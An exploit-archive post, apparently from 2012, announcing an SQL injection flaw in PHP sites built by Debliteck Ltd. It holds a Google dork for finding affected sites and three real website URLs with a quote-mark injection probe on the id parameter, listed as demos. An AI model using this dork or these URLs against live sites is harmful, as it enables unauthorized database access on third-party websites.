id: 18188
date: 05/03/2012
title: Debliteck  - SQL Injection Vulnerability
author: D0m12
cves: 

==========================================================================
<<<:>>>   Debliteck  - SQL Injection Vulnerability          <<:>>>
==========================================================================
Title:  - SQL Injection Vulnerability
Author : D0m12
Date: 03/05/2012
Google Dork--> intext:"Design and Development by Debliteck Ltd" inurl:.php?id=
Vendor Link: http://www.debliteck.com/
Tested On: Win 7
Contact : d0m1265@yahoo.com
[+]Demos
http://www.property4cyprus.com/article.php?id=15'
http://www.onestop-employment.com/article.php?id=63'
http://www.windmillscars.com/article.php?id=11'


 #########################################################################
 Greetz To :
 All My Friends From ABH & to All those who know me:)
 #########################################################################



#  0day.today [2023-03-22]  #